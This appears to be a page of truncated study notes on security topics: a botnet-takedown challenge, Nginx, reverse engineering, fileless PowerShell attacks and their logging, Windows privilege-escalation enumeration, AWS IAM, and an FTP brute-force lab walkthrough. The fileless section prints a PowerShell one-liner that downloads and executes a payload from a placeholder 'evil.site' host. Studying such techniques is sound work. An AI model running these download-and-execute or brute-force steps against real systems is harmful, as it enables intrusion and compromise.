1. Botnet Takedown Challenge
- Investigate the infected machine, identify IOCs (Indicators of Compromise), find the malware or script, determine how it works, and neutralize the botnet connection.
2. Botnet?
- A botnet is a network of infected computers (bots) controlled by a central attacker (botmaster).
- These bots may receive commands via C2, IRC servers, web requests, or reverse shells.
3. What is..
Study Record
1. Nginx?
- It is a lightweight, high-performance web server.
- It handles HTTP/HTTPS requests, delivering static files like HTML, CSS, and more to clients.
- It can also act as a reverse proxy.
2. Nginx Configuration File Structure
- /etc/nginx/nginx.conf
- /etc/nginx/sites-available/default
1) Sample:
server { listen 443 ssl; # Listen on port 443 for HTTPS server_name example.com; # Your doma..
1. What is Reverse Engineering
RE (Reverse Engineering) is the process of taking apart software (or hardware) to:
- Understand how it works
- Detect vulnerabilities or malicious behavior
- Modify or patch it
- Bypass protections
In simpler words:
- You get a compiled program (you can't see the code, but you figure out how it works anyway).
2. Reverse Engineering Tools
1) Ghidra - disassembler and deco..
1. Fileless?
- Fileless attacks are malicious scripts or commands that never touch disk.
- They only exist in memory, making them harder to detect with antivirus or endpoint detection systems.
- PowerShell is perfect for fileless execution.
2. Download & Execute Code From the Internet
IEX (New-Object Net.WebClient).DownloadString('http://evil.site/payload.ps1')
3. Obfuscation Techniques (Avoiding Det..
1. Where are PowerShell logs stored?
- Event Viewer > Applications and Services Logs > Microsoft > Windows > PowerShell > Operational
2. How to view PowerShell logs via CLI
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10 | Format-List
3. Decoding Base64 Encoded PowerShell Payloads
- Attackers often hide commands using -EncodedCommand
- Decode it like this:
[System.Text...
1. HKCU
- HKEY_CURRENT_USER
- Settings for the currently logged-in user
2. HKLM
- HKEY_LOCAL_MACHINE
- System-wide settings that apply to all users
1. User & Permission Enumeration
1) Check current user identity
whoami
2) Check user privileges
whoami /priv
3) List all local users on the system
Get-LocalUser
4) Check what groups your user belongs to
whoami /groups
2. Finding Privilege Escalation Opportunities
1) Check if PowerShell is running as an Administrator
[System.Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains "S-1-5-32-5..
1. PowerShell
- Command-line shell and scripting language built into Windows
- Unlike the traditional cmd, PowerShell can:
1) work with objects instead of just text
2) interact directly with the Windows API and registry
3) execute powerful scripts and modules
2. PowerShell Syntax
- PowerShell commands are called cmdlets
- They always follow the Verb-Noun format
Get-Process # Lists running processes..
1. Key AWS Concepts
1) IAM (Identity and Access Management)
- Users: Actual people or systems who access AWS
- Roles: Permission sets that can be assumed temporarily.
- Policies: JSON documents that define what actions are allowed or denied.
- Groups: Collections of users that share permissions
2) Important AWS Services for Privilege Escalation
- STS (Security Token Service): Used to assume roles
- EC2..

1. Initial Enumeration with Nmap
We begin by scanning the target machine using nmap to identify open ports and running services. We have found there are 2 open ports, FTP (21) and SSH (22).
2. FTP Bruteforce Attack
Since FTP is open, we attempt to brute-force the login credentials using wordlists, username.list and password.list. We have found the login name and the password.
3. Accessing FTP and Extractin..